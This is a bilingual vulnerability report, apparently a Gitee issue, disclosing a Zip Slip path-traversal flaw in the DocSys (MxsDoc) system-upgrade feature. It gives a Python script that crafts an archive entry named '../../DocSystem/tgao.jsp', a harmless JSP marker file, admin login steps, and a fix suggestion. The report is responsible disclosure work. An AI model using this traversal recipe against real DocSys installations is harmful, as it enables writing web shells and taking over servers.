【缺陷】Zip Slip vulnerability

# Instructions in English
## Description
There is a Zip Slip vulnerability in the MxsDoc(DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method did not Check "... /". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file. Writes a malicious jsp file to the web directory.

## Impact
1. Affected version: less than or equal to DocSys_V2.02.37(latest version)
2. Condition of utilization：The administrator or super administrator rights are required
3. Impact：A zip slip vulnerability in this system can result in getshell

## Code Audit
In `com.DocSystem.Controller.BaseController#unZip` method exists in the following code snippet:
![输入图片说明](https://foruda.gitee.com/images/1670575158531668374/c668d3b9_7554608.png "屏幕截图")

The value of `entry.getName()` is controllable. Inject "`.. /`", you can write the malicious jsp file to the web root.

Looking for a trigger point, found in `com.DocSystem.Controller.ManageController#upgradeSystem` method triggers the `com.DocSystem.Controller.BaseController#unZip` method.
The key code is as follows:
![输入图片说明](https://foruda.gitee.com/images/1670575255453010836/e0741a44_7554608.png "屏幕截图")

## Steps to reproduce
### Application Installation
This system is available on both github and gitee, but there is a war package on github for easy deployment. The download address is as follows: https://github.com/RainyGao-GitHub/DocSys/releases
![输入图片说明](https://foruda.gitee.com/images/1670575305500106044/a1e4b015_7554608.png "屏幕截图")

After downloading DocSystem.war, unzip it, store it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:
```
db.type=mysql
db.driver=com.mysql.cj.jdbc.Driver
db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
db.username=root
db.password=root
```

After the success of the start tomcat, visit http://localhost:8080/DocSystem/web/index.html 
During application initialization, you need to create a system administrator: admin/admin123

### Create malicious compressed files
tgao.jsp file contents:
```jsp
<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>
```
Write a python script to compress the jsp file contents into DocSystem.war and specify the name as `../../DocSystem/tgao.jsp`, which corresponds to `entry.getName()` in the source code.
```python
import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e
```
Run the python script to generate the DocSystem.war file

### Exploitation of vulnerabilities
After using the admin/admin123 login system，go to http://localhost:8080/DocSystem/manager/main.html
![输入图片说明](https://foruda.gitee.com/images/1670575569816737281/e12d40ef_7554608.png "屏幕截图")
Click the Upgrade button and upload the malicious compressed file DocSystem.war
![输入图片说明](https://foruda.gitee.com/images/1670575600182033300/dd098d90_7554608.png "屏幕截图")
Click the Confirm button，Visit: http://localhost:8080/DocSystem/tgao.jsp
![输入图片说明](https://foruda.gitee.com/images/1670575669197269485/fa1e3dce_7554608.png "屏幕截图")
The tgao.jsp file was successfully written.
## Bug Repair Suggestions
Check whether the contents returned by `entry.getName()` exist "`../`" and intercept
# 中文说明
## 漏洞描述
MxsDoc(DocSys)中存在一个Zip Slip漏洞，可导致上传恶意jsp文件。漏洞位于BaseController.java文件，其中unZip方法解压文件时未对`../` 进行检测，导致Zip Slip漏洞存在，另外可通过ManageController.java文件的upgradeSystem方法触发此漏洞。可导致像web目录写入恶意jsp文件。
## 漏洞影响
影响版本：小于等于DocSys_V2.02.37(最新版本)
利用条件：需要管理员权限登录
危害：此系统的zip slip可导致getshell
## 漏洞发现
在com.DocSystem.controller.BaseController#unZip方法中存在如下代码片段
![输入图片说明](https://foruda.gitee.com/images/1670575964977709232/f55d6b4d_7554608.png "屏幕截图")
其中entry.getName()的值是可控的，通过../可以将恶意jsp文件写到web根目录。
寻找触发点，发现在com.DocSystem.controller.ManageController#upgradeSystem方法中触发了com.DocSystem.controller.BaseController#unZip方法
关键代码如下：
![输入图片说明](https://foruda.gitee.com/images/1670575988649922707/b2a0cb6d_7554608.png "屏幕截图")
## 漏洞复现
### 制作恶意压缩包
tgao.jsp文件内容：
```java
<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>
```
编写python脚本将jsp文件内容内容压缩至DocSystem.war中，并指定name为`../../DocSystem/tgao.jsp`，此值对应源码中的entry.getName()内容
```
import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e
```
运行之后生成DocSystem.war文件
### 漏洞利用
利用zip slip漏洞可以向服务器中任何有写权限的目录写任何文件，若文件存在将会直接覆盖，这里为了有直接的效果，演示向web目录写入jsp文件，具体如下：
使用admin/admin123登录系统后访问：
http://localhost:8080/DocSystem/manager/main.html
![输入图片说明](https://foruda.gitee.com/images/1670576152949481977/3a5a8815_7554608.png "屏幕截图")
点击系统升级，上传制作完成的恶意压缩文件DocSystem.war
![输入图片说明](https://foruda.gitee.com/images/1670576171000044559/b364c593_7554608.png "屏幕截图")
点击确认即可.
访问：http://localhost:8080/DocSystem/tgao.jsp
![输入图片说明](https://foruda.gitee.com/images/1670576197175066950/56a1f4ba_7554608.png "屏幕截图")
tgao.jsp成功被写入。
## 修复建议
检查entry.getName()是否存在../并拦截

Rainy/DocSys

内容风险标识

评论 (2)

Rainy/DocSys .gitee-modal { width: 500px !important; }

内容风险标识